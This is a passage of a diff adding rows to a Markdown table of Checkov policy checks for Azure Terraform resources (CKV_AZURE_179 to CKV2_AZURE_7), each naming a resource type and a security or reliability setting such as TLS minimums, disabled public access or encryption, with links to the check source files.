+| 1448 | CKV_AZURE_179   | resource | azurerm_linux_virtual_machine_scale_set                 | Ensure VM agent is installed                                                                                                                                                                             | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py)                                                                                         |
+| 1449 | CKV_AZURE_179   | resource | azurerm_windows_virtual_machine                         | Ensure VM agent is installed                                                                                                                                                                             | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py)                                                                                         |
+| 1450 | CKV_AZURE_179   | resource | azurerm_windows_virtual_machine_scale_set               | Ensure VM agent is installed                                                                                                                                                                             | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py)                                                                                         |
+| 1451 | CKV_AZURE_180   | resource | azurerm_kusto_cluster                                   | Ensure that data explorer uses Sku with an SLA                                                                                                                                                           | Terraform | [DataExplorerSKUHasSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerSKUHasSLA.py)                                                                                   |
+| 1452 | CKV_AZURE_181   | resource | azurerm_kusto_cluster                                   | Ensure that data explorer/Kusto uses managed identities to access Azure resources securely.                                                                                                              | Terraform | [DataExplorerServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerServiceIdentity.py)                                                                       |
+| 1453 | CKV_AZURE_182   | resource | azurerm_virtual_network                                 | Ensure that VNET has at least 2 connected DNS Endpoints                                                                                                                                                  | Terraform | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetSingleDNSServer.py)                                                                                       |
+| 1454 | CKV_AZURE_182   | resource | azurerm_virtual_network_dns_servers                     | Ensure that VNET has at least 2 connected DNS Endpoints                                                                                                                                                  | Terraform | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetSingleDNSServer.py)                                                                                       |
+| 1455 | CKV_AZURE_183   | resource | azurerm_virtual_network                                 | Ensure that VNET uses local DNS addresses                                                                                                                                                                | Terraform | [VnetLocalDNS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetLocalDNS.py)                                                                                                     |
+| 1456 | CKV_AZURE_184   | resource | azurerm_app_configuration                               | Ensure 'local_auth_enabled' is set to 'False'                                                                                                                                                            | Terraform | [AppConfigLocalAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigLocalAuth.py)                                                                                         |
+| 1457 | CKV_AZURE_185   | resource | azurerm_app_configuration                               | Ensure 'Public Access' is not Enabled for App configuration                                                                                                                                              | Terraform | [AppConfigPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigPublicAccess.py)                                                                                   |
+| 1458 | CKV_AZURE_186   | resource | azurerm_app_configuration                               | Ensure App configuration encryption block is set.                                                                                                                                                        | Terraform | [AppConfigEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigEncryption.py)                                                                                       |
+| 1459 | CKV_AZURE_187   | resource | azurerm_app_configuration                               | Ensure App configuration purge protection is enabled                                                                                                                                                     | Terraform | [AppConfigPurgeProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigPurgeProtection.py)                                                                             |
+| 1460 | CKV_AZURE_188   | resource | azurerm_app_configuration                               | Ensure App configuration Sku is standard                                                                                                                                                                 | Terraform | [AppConfigSku.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigSku.py)                                                                                                     |
+| 1461 | CKV_AZURE_189   | resource | azurerm_key_vault                                       | Ensure that Azure Key Vault disables public network access                                                                                                                                               | Terraform | [KeyVaultDisablesPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultDisablesPublicNetworkAccess.py)                                                       |
+| 1462 | CKV_AZURE_190   | resource | azurerm_storage_account                                 | Ensure that Storage blobs restrict public access                                                                                                                                                         | Terraform | [StorageBlobRestrictPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageBlobRestrictPublicAccess.py)                                                               |
+| 1463 | CKV_AZURE_191   | resource | azurerm_eventgrid_topic                                 | Ensure that Managed identity provider is enabled for Azure Event Grid Topic                                                                                                                              | Terraform | [EventgridTopicIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicIdentityProviderEnabled.py)                                                   |
+| 1464 | CKV_AZURE_192   | resource | azurerm_eventgrid_topic                                 | Ensure that Azure Event Grid Topic local Authentication is disabled                                                                                                                                      | Terraform | [EventgridTopicLocalAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicLocalAuthentication.py)                                                           |
+| 1465 | CKV_AZURE_193   | resource | azurerm_eventgrid_topic                                 | Ensure public network access is disabled for Azure Event Grid Topic                                                                                                                                      | Terraform | [EventgridTopicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicNetworkAccess.py)                                                                       |
+| 1466 | CKV_AZURE_194   | resource | azurerm_eventgrid_domain                                | Ensure that Managed identity provider is enabled for Azure Event Grid Domain                                                                                                                             | Terraform | [EventgridDomainIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainIdentityProviderEnabled.py)                                                 |
+| 1467 | CKV_AZURE_195   | resource | azurerm_eventgrid_domain                                | Ensure that Azure Event Grid Domain local Authentication is disabled                                                                                                                                     | Terraform | [EventgridDomainLocalAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainLocalAuthentication.py)                                                         |
+| 1468 | CKV_AZURE_196   | resource | azurerm_signalr_service                                 | Ensure that SignalR uses a Paid Sku for its SLA                                                                                                                                                          | Terraform | [SignalRSKUSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SignalRSKUSLA.py)                                                                                                   |
+| 1469 | CKV_AZURE_197   | resource | azurerm_cdn_endpoint                                    | Ensure the Azure CDN disables the HTTP endpoint                                                                                                                                                          | Terraform | [CDNDisableHttpEndpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNDisableHttpEndpoints.py)                                                                               |
+| 1470 | CKV_AZURE_198   | resource | azurerm_cdn_endpoint                                    | Ensure the Azure CDN enables the HTTPS endpoint                                                                                                                                                          | Terraform | [CDNEnableHttpsEndpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNEnableHttpsEndpoints.py)                                                                               |
+| 1471 | CKV_AZURE_199   | resource | azurerm_servicebus_namespace                            | Ensure that Azure Service Bus uses double encryption                                                                                                                                                     | Terraform | [AzureServicebusDoubleEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusDoubleEncryptionEnabled.py)                                                 |
+| 1472 | CKV_AZURE_200   | resource | azurerm_cdn_endpoint_custom_domain                      | Ensure the Azure CDN endpoint is using the latest version of TLS encryption                                                                                                                              | Terraform | [CDNTLSProtocol12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNTLSProtocol12.py)                                                                                             |
+| 1473 | CKV_AZURE_201   | resource | azurerm_servicebus_namespace                            | Ensure that Azure Service Bus uses a customer-managed key to encrypt data                                                                                                                                | Terraform | [AzureServicebusHasCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusHasCMK.py)                                                                                   |
+| 1474 | CKV_AZURE_202   | resource | azurerm_servicebus_namespace                            | Ensure that Managed identity provider is enabled for Azure Service Bus                                                                                                                                   | Terraform | [AzureServicebusIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusIdentityProviderEnabled.py)                                                 |
+| 1475 | CKV_AZURE_203   | resource | azurerm_servicebus_namespace                            | Ensure Azure Service Bus Local Authentication is disabled                                                                                                                                                | Terraform | [AzureServicebusLocalAuthDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusLocalAuthDisabled.py)                                                             |
+| 1476 | CKV_AZURE_204   | resource | azurerm_servicebus_namespace                            | Ensure 'public network access enabled' is set to 'False' for Azure Service Bus                                                                                                                           | Terraform | [AzureServicebusPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusPublicAccessDisabled.py)                                                       |
+| 1477 | CKV_AZURE_205   | resource | azurerm_servicebus_namespace                            | Ensure Azure Service Bus is using the latest version of TLS encryption                                                                                                                                   | Terraform | [AzureServicebusMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusMinTLSVersion.py)                                                                     |
+| 1478 | CKV_AZURE_206   | resource | azurerm_storage_account                                 | Ensure that Storage Accounts use replication                                                                                                                                                             | Terraform | [StorageAccountsUseReplication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountsUseReplication.py)                                                                   |
+| 1479 | CKV_AZURE_207   | resource | azurerm_search_service                                  | Ensure Azure Cognitive Search service uses managed identities to access Azure resources                                                                                                                  | Terraform | [AzureSearchManagedIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchManagedIdentity.py)                                                                         |
+| 1480 | CKV_AZURE_208   | resource | azurerm_search_service                                  | Ensure that Azure Cognitive Search maintains SLA for index updates                                                                                                                                       | Terraform | [AzureSearchSLAIndex.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchSLAIndex.py)                                                                                       |
+| 1481 | CKV_AZURE_209   | resource | azurerm_search_service                                  | Ensure that Azure Cognitive Search maintains SLA for search index queries                                                                                                                                | Terraform | [AzureSearchSLAQueryUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchSLAQueryUpdates.py)                                                                         |
+| 1482 | CKV_AZURE_210   | resource | azurerm_search_service                                  | Ensure Azure Cognitive Search service allowed IPS does not give public Access                                                                                                                            | Terraform | [AzureSearchAllowedIPsNotGlobal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchAllowedIPsNotGlobal.py)                                                                 |
+| 1483 | CKV_AZURE_211   | resource | azurerm_service_plan                                    | Ensure App Service plan suitable for production use                                                                                                                                                      | Terraform | [AppServiceSkuMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSkuMinimum.py)                                                                                     |
+| 1484 | CKV_AZURE_212   | resource | azurerm_service_plan                                    | Ensure App Service has a minimum number of instances for failover                                                                                                                                        | Terraform | [AppServiceInstanceMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceInstanceMinimum.py)                                                                           |
+| 1485 | CKV_AZURE_213   | resource | azurerm_app_service                                     | Ensure that App Service configures health check                                                                                                                                                          | Terraform | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py)                                                                             |
+| 1486 | CKV_AZURE_213   | resource | azurerm_linux_web_app                                   | Ensure that App Service configures health check                                                                                                                                                          | Terraform | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py)                                                                             |
+| 1487 | CKV_AZURE_213   | resource | azurerm_windows_web_app                                 | Ensure that App Service configures health check                                                                                                                                                          | Terraform | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py)                                                                             |
+| 1488 | CKV_AZURE_214   | resource | azurerm_linux_web_app                                   | Ensure App Service is set to be always on                                                                                                                                                                | Terraform | [AppServiceAlwaysOn.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAlwaysOn.py)                                                                                         |
+| 1489 | CKV_AZURE_214   | resource | azurerm_windows_web_app                                 | Ensure App Service is set to be always on                                                                                                                                                                | Terraform | [AppServiceAlwaysOn.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAlwaysOn.py)                                                                                         |
+| 1490 | CKV_AZURE_215   | resource | azurerm_api_management_backend                          | Ensure API management backend uses https                                                                                                                                                                 | Terraform | [APIManagementBackendHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementBackendHTTPS.py)                                                                           |
+| 1491 | CKV_AZURE_216   | resource | azurerm_firewall                                        | Ensure DenyIntelMode is set to Deny for Azure Firewalls                                                                                                                                                  | Terraform | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallDenyThreatIntelMode.py)                                                             |
+| 1492 | CKV_AZURE_217   | resource | azurerm_application_gateway                             | Ensure Azure Application gateways listener that allow connection requests over HTTP                                                                                                                      | Terraform | [AppGWUsesHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWUsesHttps.py)                                                                                                 |
+| 1493 | CKV_AZURE_218   | resource | azurerm_application_gateway                             | Ensure Application Gateway defines secure protocols for in transit communication                                                                                                                         | Terraform | [AppGWDefinesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWDefinesSecureProtocols.py)                                                                       |
+| 1494 | CKV_AZURE_219   | resource | azurerm_firewall                                        | Ensure Firewall defines a firewall policy                                                                                                                                                                | Terraform | [AzureFirewallDefinesPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallDefinesPolicy.py)                                                                         |
+| 1495 | CKV_AZURE_220   | resource | azurerm_firewall_policy                                 | Ensure Firewall policy has IDPS mode as deny                                                                                                                                                             | Terraform | [AzureFirewallPolicyIDPSDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallPolicyIDPSDeny.py)                                                                       |
+| 1496 | CKV_AZURE_221   | resource | azurerm_linux_function_app                              | Ensure that Azure Function App public network access is disabled                                                                                                                                         | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py)                                                               |
+| 1497 | CKV_AZURE_221   | resource | azurerm_linux_function_app_slot                         | Ensure that Azure Function App public network access is disabled                                                                                                                                         | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py)                                                               |
+| 1498 | CKV_AZURE_221   | resource | azurerm_windows_function_app                            | Ensure that Azure Function App public network access is disabled                                                                                                                                         | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py)                                                               |
+| 1499 | CKV_AZURE_221   | resource | azurerm_windows_function_app_slot                       | Ensure that Azure Function App public network access is disabled                                                                                                                                         | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py)                                                               |
+| 1500 | CKV_AZURE_222   | resource | azurerm_linux_web_app                                   | Ensure that Azure Web App public network access is disabled                                                                                                                                              | Terraform | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePublicAccessDisabled.py)                                                                 |
+| 1501 | CKV_AZURE_222   | resource | azurerm_windows_web_app                                 | Ensure that Azure Web App public network access is disabled                                                                                                                                              | Terraform | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePublicAccessDisabled.py)                                                                 |
+| 1502 | CKV_AZURE_223   | resource | azurerm_eventhub_namespace                              | Ensure Event Hub Namespace uses at least TLS 1.2                                                                                                                                                         | Terraform | [EventHubNamespaceMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventHubNamespaceMinTLS12.py)                                                                           |
+| 1503 | CKV_AZURE_224   | resource | azurerm_mssql_database                                  | Ensure that the Ledger feature is enabled on database that requires cryptographic proof and nonrepudiation of data integrity                                                                             | Terraform | [SQLDatabaseLedgerEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLDatabaseLedgerEnabled.py)                                                                             |
+| 1504 | CKV_AZURE_225   | resource | azurerm_service_plan                                    | Ensure the App Service Plan is zone redundant                                                                                                                                                            | Terraform | [AppServicePlanZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePlanZoneRedundant.py)                                                                       |
+| 1505 | CKV_AZURE_226   | resource | azurerm_kubernetes_cluster                              | Ensure ephemeral disks are used for OS disks                                                                                                                                                             | Terraform | [AKSEphemeralOSDisks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEphemeralOSDisks.py)                                                                                       |
+| 1506 | CKV_AZURE_227   | resource | azurerm_kubernetes_cluster                              | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources                                                                                             | Terraform | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEncryptionAtHostEnabled.py)                                                                         |
+| 1507 | CKV_AZURE_227   | resource | azurerm_kubernetes_cluster_node_pool                    | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources                                                                                             | Terraform | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEncryptionAtHostEnabled.py)                                                                         |
+| 1508 | CKV_AZURE_228   | resource | azurerm_eventhub_namespace                              | Ensure the Azure Event Hub Namespace is zone redundant                                                                                                                                                   | Terraform | [EventHubNamespaceZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventHubNamespaceZoneRedundant.py)                                                                 |
+| 1509 | CKV_AZURE_229   | resource | azurerm_mssql_database                                  | Ensure the Azure SQL Database Namespace is zone redundant                                                                                                                                                | Terraform | [SQLDatabaseZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLDatabaseZoneRedundant.py)                                                                             |
+| 1510 | CKV_AZURE_230   | resource | azurerm_redis_cache                                     | Standard Replication should be enabled                                                                                                                                                                   | Terraform | [RedisCacheStandardReplicationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheStandardReplicationEnabled.py)                                                     |
+| 1511 | CKV_AZURE_231   | resource | azurerm_app_service_environment_v3                      | Ensure App Service Environment is zone redundant                                                                                                                                                         | Terraform | [AppServiceEnvironmentZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnvironmentZoneRedundant.py)                                                         |
+| 1512 | CKV_AZURE_232   | resource | azurerm_kubernetes_cluster                              | Ensure that only critical system pods run on system nodes                                                                                                                                                | Terraform | [AKSOnlyCriticalPodsOnSystemNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSOnlyCriticalPodsOnSystemNodes.py)                                                             |
+| 1513 | CKV_AZURE_233   | resource | azurerm_container_registry                              | Ensure Azure Container Registry (ACR) is zone redundant                                                                                                                                                  | Terraform | [ACREnableZoneRedundancy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableZoneRedundancy.py)                                                                               |
+| 1514 | CKV_AZURE_234   | resource | azurerm_security_center_subscription_pricing            | Ensure that Azure Defender for cloud is set to On for Resource Manager                                                                                                                                   | Terraform | [AzureDefenderDisabledForResManager.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderDisabledForResManager.py)                                                         |
+| 1515 | CKV_AZURE_235   | resource | azurerm_container_group                                 | Ensure that Azure container environment variables are configured with secure values only                                                                                                                 | Terraform | [AzureContainerInstanceEnvVarSecureValueType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureContainerInstanceEnvVarSecureValueType.py)                                       |
+| 1516 | CKV_AZURE_236   | resource | azurerm_cognitive_account                               | Ensure that Cognitive Services accounts disable local authentication                                                                                                                                     | Terraform | [CognitiveServicesEnableLocalAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CognitiveServicesEnableLocalAuth.py)                                                             |
+| 1517 | CKV_AZURE_237   | resource | azurerm_container_registry                              | Ensure dedicated data endpoints are enabled.                                                                                                                                                             | Terraform | [ACRDedicatedDataEndpointEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRDedicatedDataEndpointEnabled.py)                                                               |
+| 1518 | CKV_AZURE_238   | resource | azurerm_cognitive_account                               | Ensure that all Azure Cognitive Services accounts are configured with a managed identity                                                                                                                 | Terraform | [CognitiveServicesConfigureIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CognitiveServicesConfigureIdentity.py)                                                         |
+| 1519 | CKV_AZURE_239   | resource | azurerm_synapse_workspace                               | Ensure Azure Synapse Workspace administrator login password is not exposed                                                                                                                               | Terraform | [SynapseWorkspaceAdministratorLoginPasswordHidden.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseWorkspaceAdministratorLoginPasswordHidden.py)                             |
+| 1520 | CKV_AZURE_240   | resource | azurerm_synapse_workspace                               | Ensure Azure Synapse Workspace is encrypted with a CMK                                                                                                                                                   | Terraform | [SynapseWorkspaceCMKEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseWorkspaceCMKEncryption.py)                                                                   |
+| 1521 | CKV_AZURE_241   | resource | azurerm_synapse_sql_pool                                | Ensure Synapse SQL pools are encrypted                                                                                                                                                                   | Terraform | [SynapseSQLPoolDataEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseSQLPoolDataEncryption.py)                                                                     |
+| 1522 | CKV_AZURE_242   | resource | azurerm_synapse_spark_pool                              | Ensure isolated compute is enabled for Synapse Spark pools                                                                                                                                               | Terraform | [AzureSparkPoolIsolatedComputeEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSparkPoolIsolatedComputeEnabled.py)                                                     |
+| 1523 | CKV2_AZURE_1    | resource | azurerm_storage_account                                 | Ensure storage for critical data are encrypted with Customer Managed Key                                                                                                                                 | Terraform | [StorageCriticalDataEncryptedCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageCriticalDataEncryptedCMK.yaml)                                                       |
+| 1524 | CKV2_AZURE_2    | resource | azurerm_mssql_server_security_alert_policy              | Ensure that Vulnerability Assessment (VA) is enabled on a SQL server by setting a Storage Account                                                                                                        | Terraform | [VAisEnabledInStorageAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAisEnabledInStorageAccount.yaml)                                                               |
+| 1525 | CKV2_AZURE_2    | resource | azurerm_sql_server                                      | Ensure that Vulnerability Assessment (VA) is enabled on a SQL server by setting a Storage Account                                                                                                        | Terraform | [VAisEnabledInStorageAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAisEnabledInStorageAccount.yaml)                                                               |
+| 1526 | CKV2_AZURE_3    | resource | azurerm_mssql_server                                    | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server                                                                                                                               | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml)                                                                       |
+| 1527 | CKV2_AZURE_3    | resource | azurerm_mssql_server_security_alert_policy              | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server                                                                                                                               | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml)                                                                       |
+| 1528 | CKV2_AZURE_3    | resource | azurerm_mssql_server_vulnerability_assessment           | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server                                                                                                                               | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml)                                                                       |
+| 1529 | CKV2_AZURE_3    | resource | azurerm_sql_server                                      | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server                                                                                                                               | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml)                                                                       |
+| 1530 | CKV2_AZURE_4    | resource | azurerm_mssql_server                                    | Ensure Azure SQL server ADS VA Send scan reports to is configured                                                                                                                                        | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml)                                                                   |
+| 1531 | CKV2_AZURE_4    | resource | azurerm_mssql_server_security_alert_policy              | Ensure Azure SQL server ADS VA Send scan reports to is configured                                                                                                                                        | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml)                                                                   |
+| 1532 | CKV2_AZURE_4    | resource | azurerm_mssql_server_vulnerability_assessment           | Ensure Azure SQL server ADS VA Send scan reports to is configured                                                                                                                                        | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml)                                                                   |
+| 1533 | CKV2_AZURE_4    | resource | azurerm_sql_server                                      | Ensure Azure SQL server ADS VA Send scan reports to is configured                                                                                                                                        | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml)                                                                   |
+| 1534 | CKV2_AZURE_5    | resource | azurerm_mssql_server                                    | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server                                                                                         | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml)                                                   |
+| 1535 | CKV2_AZURE_5    | resource | azurerm_mssql_server_security_alert_policy              | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server                                                                                         | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml)                                                   |
+| 1536 | CKV2_AZURE_5    | resource | azurerm_mssql_server_vulnerability_assessment           | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server                                                                                         | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml)                                                   |
+| 1537 | CKV2_AZURE_5    | resource | azurerm_sql_server                                      | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server                                                                                         | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml)                                                   |
+| 1538 | CKV2_AZURE_6    | resource | azurerm_sql_firewall_rule                               | Ensure 'Allow access to Azure services' for PostgreSQL Database Server is disabled                                                                                                                       | Terraform | [AccessToPostgreSQLFromAzureServicesIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AccessToPostgreSQLFromAzureServicesIsDisabled.yaml)                           |
+| 1539 | CKV2_AZURE_6    | resource | azurerm_sql_server                                      | Ensure 'Allow access to Azure services' for PostgreSQL Database Server is disabled                                                                                                                       | Terraform | [AccessToPostgreSQLFromAzureServicesIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AccessToPostgreSQLFromAzureServicesIsDisabled.yaml)                           |
+| 1540 | CKV2_AZURE_7    | resource | azurerm_sql_server                                      | Ensure that Azure Active Directory Admin is configured                                                                                                                                                   | Terraform | [AzureActiveDirectoryAdminIsConfigured.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureActiveDirectoryAdminIsConfigured.yaml)                                           |
